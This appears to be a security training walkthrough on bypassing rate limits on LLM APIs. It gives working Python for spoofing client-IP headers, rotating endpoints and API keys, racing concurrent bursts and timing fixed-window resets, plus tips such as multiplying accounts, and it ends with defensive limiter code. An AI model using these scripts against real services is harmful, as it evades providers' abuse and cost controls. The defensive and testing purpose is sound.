API Rate Limit Bypass
Techniques to bypass API rate limiting on LLM services, including header manipulation, distributed requests, authentication rotation, and endpoint discovery.
LLM API services implement rate limiting to prevent abuse, control costs, and ensure fair access. However, rate limiting implementations vary in sophistication, and many common configurations have exploitable weaknesses. Understanding these weaknesses is essential for both red teams (testing defenses) and blue teams (building robust limits). This walkthrough covers rate limit fingerprinting, bypass techniques, and defensive recommendations.
Step 1: Fingerprinting Rate Limit Implementation
Before attempting bypasses, identify how rate limiting is implemented by analyzing response headers and behavior.
"""
Fingerprint rate limiting implementation by analyzing
response headers and timing patterns.
"""
import requests
import time
from dataclasses import dataclass
from typing import Optional
@dataclass
class RateLimitFingerprint:
limit_type: str # "token-bucket", "sliding-window", "fixed-window"
limit_value: Optional[int]
window_seconds: Optional[int]
tracked_by: str # "ip", "api-key", "user-id", "combination"
headers_used: list[str]
reset_behavior: str
def fingerprint_rate_limiter(
url: str,
headers: dict,
num_requests: int = 20,
delay: float = 0.1,
) -> dict:
"""Probe an API endpoint to fingerprint its rate limiting."""
results = []
for i in range(num_requests):
start = time.time()
try:
resp = requests.get(url, headers=headers, timeout=10)
elapsed = time.time() - start
result = {
"request_num": i + 1,
"status_code": resp.status_code,
"elapsed_ms": round(elapsed * 1000, 1),
"rate_limit_headers": {},
}
# Extract rate limit headers
rl_headers = [
"X-RateLimit-Limit",
"X-RateLimit-Remaining",
"X-RateLimit-Reset",
"Retry-After",
"RateLimit-Limit",
"RateLimit-Remaining",
"RateLimit-Reset",
"X-Rate-Limit-Limit",
"X-Rate-Limit-Remaining",
]
for header in rl_headers:
value = resp.headers.get(header)
if value:
result["rate_limit_headers"][header] = value
results.append(result)
if resp.status_code == 429:
retry_after = resp.headers.get("Retry-After", "unknown")
print(f" Request {i+1}: RATE LIMITED (retry after: {retry_after})")
break
else:
remaining = resp.headers.get("X-RateLimit-Remaining", "?")
print(f" Request {i+1}: {resp.status_code} (remaining: {remaining})")
except requests.exceptions.RequestException as e:
results.append({"request_num": i + 1, "error": str(e)})
time.sleep(delay)
# Analyze results
analysis = analyze_fingerprint(results)
return {"results": results, "analysis": analysis}
def analyze_fingerprint(results: list[dict]) -> dict:
"""Analyze probing results to determine rate limit configuration."""
headers_seen = set()
for r in results:
headers_seen.update(r.get("rate_limit_headers", {}).keys())
# Determine limit value from headers
limit_value = None
for r in results:
limit = r.get("rate_limit_headers", {}).get("X-RateLimit-Limit")
if limit:
limit_value = int(limit)
break
# Find when rate limiting kicked in
limited_at = None
for r in results:
if r.get("status_code") == 429:
limited_at = r["request_num"]
break
return {
"headers_detected": list(headers_seen),
"limit_value": limit_value,
"limited_at_request": limited_at,
"uses_retry_after": any(
"Retry-After" in r.get("rate_limit_headers", {})
for r in results
),
}
print("Rate limit fingerprinting ready")
print("Call fingerprint_rate_limiter() with your target endpoint")Step 2: Header-Based Bypass Techniques
Many rate limiters track clients by IP address, which can be spoofed through HTTP headers when the application trusts proxy headers.
"""
Techniques for bypassing IP-based rate limiting through
HTTP header manipulation.
"""
import requests
import random
from typing import Generator
def generate_random_ip() -> str:
"""Generate a random RFC 1918 or public-looking IP address."""
return f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
def header_bypass_techniques() -> list[dict]:
"""Generate request headers that may bypass IP-based rate limiting.
Many load balancers and WAFs trust X-Forwarded-For and similar
headers, using them instead of the actual client IP for rate limiting.
"""
random_ip = generate_random_ip()
techniques = [
{
"name": "x_forwarded_for",
"headers": {"X-Forwarded-For": random_ip},
"description": "Most common proxy header, trusted by many load balancers",
},
{
"name": "x_real_ip",
"headers": {"X-Real-IP": random_ip},
"description": "Nginx-specific client IP header",
},
{
"name": "x_originating_ip",
"headers": {"X-Originating-IP": random_ip},
"description": "Microsoft/Exchange client IP header",
},
{
"name": "x_client_ip",
"headers": {"X-Client-IP": random_ip},
"description": "Generic client IP header used by some proxies",
},
{
"name": "cf_connecting_ip",
"headers": {"CF-Connecting-IP": random_ip},
"description": "Cloudflare-specific header (effective if behind CF)",
},
{
"name": "true_client_ip",
"headers": {"True-Client-IP": random_ip},
"description": "Akamai CDN client IP header",
},
{
"name": "x_forwarded_for_chain",
"headers": {"X-Forwarded-For": f"{random_ip}, {generate_random_ip()}, {generate_random_ip()}"},
"description": "Multi-hop proxy chain (some parsers take the first IP)",
},
]
return techniques
def test_header_bypass(
url: str,
base_headers: dict,
requests_per_technique: int = 5,
) -> list[dict]:
"""Test each header bypass technique against the target."""
techniques = header_bypass_techniques()
results = []
for technique in techniques:
headers = {**base_headers, **technique["headers"]}
successes = 0
for i in range(requests_per_technique):
# Rotate IP each request
if "X-Forwarded-For" in technique["headers"]:
headers["X-Forwarded-For"] = generate_random_ip()
try:
resp = requests.get(url, headers=headers, timeout=10)
if resp.status_code != 429:
successes += 1
except requests.exceptions.RequestException:
pass
results.append({
"technique": technique["name"],
"description": technique["description"],
"success_rate": successes / requests_per_technique,
"effective": successes == requests_per_technique,
})
status = "EFFECTIVE" if successes == requests_per_technique else "BLOCKED"
print(f" {technique['name']}: {status} ({successes}/{requests_per_technique})")
return results
print("Header bypass techniques ready")Step 3: Distributed Rate Limit Bypass
"""
Techniques for distributing requests to stay under rate limits
or exploit inconsistencies in distributed rate limiting.
"""
import asyncio
import aiohttp
import time
from dataclasses import dataclass
@dataclass
class DistributedBypassResult:
technique: str
total_requests: int
successful: int
rate_limited: int
effective_rps: float
async def endpoint_rotation_bypass(
endpoints: list[str],
headers: dict,
total_requests: int = 50,
) -> DistributedBypassResult:
"""Rotate across multiple API endpoints that share the same backend.
If rate limits are per-endpoint rather than per-user, distributing
requests across endpoints multiplies the effective limit.
"""
successful = 0
limited = 0
start = time.time()
async with aiohttp.ClientSession(headers=headers) as session:
for i in range(total_requests):
endpoint = endpoints[i % len(endpoints)]
try:
async with session.get(endpoint, timeout=aiohttp.ClientTimeout(total=10)) as resp:
if resp.status == 429:
limited += 1
else:
successful += 1
except Exception:
pass
elapsed = time.time() - start
return DistributedBypassResult(
technique="endpoint_rotation",
total_requests=total_requests,
successful=successful,
rate_limited=limited,
effective_rps=round(successful / elapsed, 1),
)
async def concurrent_burst_bypass(
url: str,
headers: dict,
burst_size: int = 20,
) -> DistributedBypassResult:
"""Send a burst of concurrent requests that arrive before
the rate limiter can update its counter.
This exploits race conditions in non-atomic rate limit implementations.
"""
successful = 0
limited = 0
start = time.time()
async with aiohttp.ClientSession(headers=headers) as session:
tasks = []
for _ in range(burst_size):
tasks.append(session.get(url, timeout=aiohttp.ClientTimeout(total=10)))
responses = await asyncio.gather(*tasks, return_exceptions=True)
for resp in responses:
if isinstance(resp, Exception):
continue
if resp.status == 429:
limited += 1
else:
successful += 1
resp.close()
elapsed = time.time() - start
return DistributedBypassResult(
technique="concurrent_burst",
total_requests=burst_size,
successful=successful,
rate_limited=limited,
effective_rps=round(successful / elapsed, 1) if elapsed > 0 else 0,
)
print("Distributed bypass techniques ready")Step 4: Authentication Rotation
"""
Bypass per-key rate limits by rotating API keys or tokens.
"""
from dataclasses import dataclass
from typing import Optional
import time
import requests
@dataclass
class AuthRotationResult:
keys_used: int
total_requests: int
successful: int
rate_limited: int
effective_multiplier: float
class APIKeyRotator:
"""Rotate API keys to multiply effective rate limits."""
def __init__(self, api_keys: list[str]):
self.keys = api_keys
self.current_idx = 0
self.key_usage = {key: 0 for key in api_keys}
self.key_limited = {key: False for key in api_keys}
def get_next_key(self) -> Optional[str]:
"""Get the next available (non-rate-limited) API key."""
for _ in range(len(self.keys)):
key = self.keys[self.current_idx]
self.current_idx = (self.current_idx + 1) % len(self.keys)
if not self.key_limited.get(key, False):
return key
return None # All keys exhausted
def mark_limited(self, key: str) -> None:
"""Mark a key as rate limited."""
self.key_limited[key] = True
def send_request(
self,
url: str,
base_headers: dict,
key_header: str = "Authorization",
key_prefix: str = "Bearer ",
) -> Optional[requests.Response]:
"""Send a request using the next available key."""
key = self.get_next_key()
if key is None:
return None
headers = {**base_headers, key_header: f"{key_prefix}{key}"}
self.key_usage[key] += 1
try:
resp = requests.get(url, headers=headers, timeout=10)
if resp.status_code == 429:
self.mark_limited(key)
return resp
except requests.exceptions.RequestException:
return None
def run_rotation_test(
self,
url: str,
base_headers: dict,
total_requests: int = 100,
) -> AuthRotationResult:
"""Test key rotation effectiveness."""
successful = 0
limited = 0
for _ in range(total_requests):
resp = self.send_request(url, base_headers)
if resp is None:
break
if resp.status_code == 429:
limited += 1
else:
successful += 1
single_key_limit = max(self.key_usage.values()) if self.key_usage else 0
return AuthRotationResult(
keys_used=len(self.keys),
total_requests=successful + limited,
successful=successful,
rate_limited=limited,
effective_multiplier=round(
successful / max(single_key_limit, 1), 1
),
)
print("API key rotation framework ready")Step 5: Window Boundary Exploitation
"""
Exploit the reset boundary of fixed-window rate limiters.
"""
import time
import requests
from dataclasses import dataclass
@dataclass
class WindowExploitResult:
technique: str
requests_in_window: int
normal_limit: int
effective_limit: int
def exploit_fixed_window(
url: str,
headers: dict,
window_seconds: int = 60,
limit: int = 100,
) -> WindowExploitResult:
"""Exploit fixed-window rate limiters by timing requests at window boundaries.
Fixed-window rate limiters reset their counter at fixed intervals.
By sending limit requests just before the window resets and limit
more immediately after, an attacker gets 2x the limit in a short burst.
"""
# Step 1: Find the window reset time from headers
resp = requests.get(url, headers=headers, timeout=10)
reset_time = resp.headers.get("X-RateLimit-Reset")
if reset_time:
reset_ts = int(reset_time)
current = int(time.time())
wait_seconds = reset_ts - current
if wait_seconds > 0 and wait_seconds < window_seconds:
print(f"Window resets in {wait_seconds} seconds")
# Wait until just before reset
if wait_seconds > 2:
print(f"Waiting {wait_seconds - 1} seconds...")
time.sleep(wait_seconds - 1)
# Step 2: Send burst of requests straddling the window boundary
pre_window = 0
post_window = 0
total_success = 0
# Burst just before window reset
for _ in range(limit):
try:
r = requests.get(url, headers=headers, timeout=5)
if r.status_code != 429:
pre_window += 1
total_success += 1
except Exception:
break
# Brief pause for window to reset
time.sleep(1.5)
# Burst just after window reset
for _ in range(limit):
try:
r = requests.get(url, headers=headers, timeout=5)
if r.status_code != 429:
post_window += 1
total_success += 1
except Exception:
break
return WindowExploitResult(
technique="fixed_window_boundary",
requests_in_window=total_success,
normal_limit=limit,
effective_limit=total_success,
)
print("Window boundary exploitation ready")Step 6: LLM-Specific Rate Limit Bypasses
"""
LLM-specific rate limit bypass techniques that exploit
how token-based billing and rate limiting work.
"""
from dataclasses import dataclass
@dataclass
class LLMRateLimitBypass:
name: str
description: str
target: str
effectiveness: str
LLM_BYPASS_TECHNIQUES = [
LLMRateLimitBypass(
name="model_parameter_variation",
description="Different model parameters (temperature, max_tokens) may be tracked separately",
target="Per-model or per-configuration rate limits",
effectiveness="Low - most APIs track by key, not parameters",
),
LLMRateLimitBypass(
name="streaming_vs_blocking",
description="Streaming responses may count differently than blocking responses",
target="Token-based rate limits",
effectiveness="Medium - some implementations count tokens differently for streamed responses",
),
LLMRateLimitBypass(
name="batch_api_abuse",
description="Batch APIs may have separate or higher rate limits than real-time APIs",
target="Separate batch endpoint rate limits",
effectiveness="Medium - batching can multiply effective throughput",
),
LLMRateLimitBypass(
name="model_version_switching",
description="Switch between model versions (gpt-4o vs gpt-4o-mini) if limits are per-model",
target="Per-model rate limits",
effectiveness="Medium - many APIs have per-model limits",
),
LLMRateLimitBypass(
name="organization_rotation",
description="Create multiple organizations/projects with separate billing",
target="Per-organization rate limits",
effectiveness="High - but requires multiple accounts",
),
]
for technique in LLM_BYPASS_TECHNIQUES:
print(f"{technique.name}: [{technique.effectiveness}]")
print(f" {technique.description}")
print()Step 7: Automated Rate Limit Testing
"""
Automated framework for comprehensive rate limit testing.
"""
import json
import time
import requests
from pathlib import Path
from dataclasses import dataclass, asdict
@dataclass
class RateLimitTestResult:
technique: str
target_url: str
requests_sent: int
requests_succeeded: int
requests_rate_limited: int
bypass_effective: bool
notes: str
class RateLimitTester:
"""Comprehensive rate limit testing framework."""
def __init__(self, target_url: str, auth_headers: dict):
self.target_url = target_url
self.auth_headers = auth_headers
self.results: list[RateLimitTestResult] = []
def test_all_techniques(self) -> list[RateLimitTestResult]:
"""Run all bypass techniques and collect results."""
print("Rate Limit Testing Campaign")
print("=" * 50)
# Test 1: Baseline (no bypass)
result = self._test_baseline()
self.results.append(result)
# Test 2: Header manipulation
result = self._test_headers()
self.results.append(result)
return self.results
def _test_baseline(self) -> RateLimitTestResult:
"""Establish baseline rate limit behavior."""
print("\nTest: Baseline rate limit")
succeeded = 0
limited = 0
for i in range(50):
try:
resp = requests.get(self.target_url, headers=self.auth_headers, timeout=10)
if resp.status_code == 429:
limited += 1
if limited == 1:
print(f" Rate limited at request {i+1}")
break
succeeded += 1
except Exception:
break
time.sleep(0.05)
return RateLimitTestResult(
technique="baseline",
target_url=self.target_url,
requests_sent=succeeded + limited,
requests_succeeded=succeeded,
requests_rate_limited=limited,
bypass_effective=False,
notes=f"Baseline: limited after {succeeded} requests",
)
def _test_headers(self) -> RateLimitTestResult:
"""Test header-based bypass."""
print("\nTest: X-Forwarded-For header rotation")
succeeded = 0
limited = 0
for i in range(50):
import random
fake_ip = f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
headers = {**self.auth_headers, "X-Forwarded-For": fake_ip}
try:
resp = requests.get(self.target_url, headers=headers, timeout=10)
if resp.status_code == 429:
limited += 1
else:
succeeded += 1
except Exception:
break
time.sleep(0.05)
return RateLimitTestResult(
technique="x_forwarded_for_rotation",
target_url=self.target_url,
requests_sent=succeeded + limited,
requests_succeeded=succeeded,
requests_rate_limited=limited,
bypass_effective=limited == 0,
notes=f"XFF rotation: {succeeded} succeeded, {limited} limited",
)
def generate_report(self, output_path: str) -> dict:
report = {
"target": self.target_url,
"results": [asdict(r) for r in self.results],
"recommendations": [
"Use actual TCP connection IP, not X-Forwarded-For, for rate limiting",
"Implement sliding window or token bucket instead of fixed window",
"Use atomic operations for distributed rate limiting",
"Rate limit by both IP and API key for defense in depth",
"Add anomaly detection for burst patterns",
],
}
with open(output_path, "w") as f:
json.dump(report, f, indent=2)
return report
print("Rate limit testing framework ready")Step 8: Defensive Recommendations
"""
Robust rate limiting implementation reference for LLM APIs.
"""
import time
from dataclasses import dataclass
from typing import Optional
class SlidingWindowRateLimiter:
"""A sliding window rate limiter that is resistant to boundary attacks."""
def __init__(self, limit: int, window_seconds: int):
self.limit = limit
self.window = window_seconds
self.requests: dict[str, list[float]] = {}
def is_allowed(self, client_id: str) -> bool:
"""Check if a request from client_id should be allowed."""
now = time.time()
cutoff = now - self.window
# Get existing timestamps and remove expired ones
timestamps = self.requests.get(client_id, [])
timestamps = [t for t in timestamps if t > cutoff]
if len(timestamps) >= self.limit:
self.requests[client_id] = timestamps
return False
timestamps.append(now)
self.requests[client_id] = timestamps
return True
def get_remaining(self, client_id: str) -> int:
"""Get remaining requests for a client."""
now = time.time()
cutoff = now - self.window
timestamps = [
t for t in self.requests.get(client_id, [])
if t > cutoff
]
return max(0, self.limit - len(timestamps))
class MultiDimensionalRateLimiter:
"""Rate limit by multiple dimensions simultaneously."""
def __init__(self):
self.by_ip = SlidingWindowRateLimiter(limit=100, window_seconds=60)
self.by_key = SlidingWindowRateLimiter(limit=60, window_seconds=60)
self.by_user = SlidingWindowRateLimiter(limit=30, window_seconds=60)
self.global_limiter = SlidingWindowRateLimiter(limit=10000, window_seconds=60)
def check(self, ip: str, api_key: str, user_id: str) -> dict:
"""Check all rate limit dimensions."""
ip_ok = self.by_ip.is_allowed(ip)
key_ok = self.by_key.is_allowed(api_key)
user_ok = self.by_user.is_allowed(user_id)
global_ok = self.global_limiter.is_allowed("global")
allowed = all([ip_ok, key_ok, user_ok, global_ok])
return {
"allowed": allowed,
"ip_remaining": self.by_ip.get_remaining(ip),
"key_remaining": self.by_key.get_remaining(api_key),
"user_remaining": self.by_user.get_remaining(user_id),
"blocked_by": (
"ip" if not ip_ok else
"key" if not key_ok else
"user" if not user_ok else
"global" if not global_ok else
None
),
}
limiter = MultiDimensionalRateLimiter()
print("Multi-dimensional rate limiter ready")Related Topics
- Inference Endpoint Exploitation -- Broader API security testing
- API Enumeration for LLMs -- Discovering API endpoints
- Capability Probing Methodology -- Systematic API assessment
How does the fixed-window boundary exploit achieve up to 2x the intended rate limit?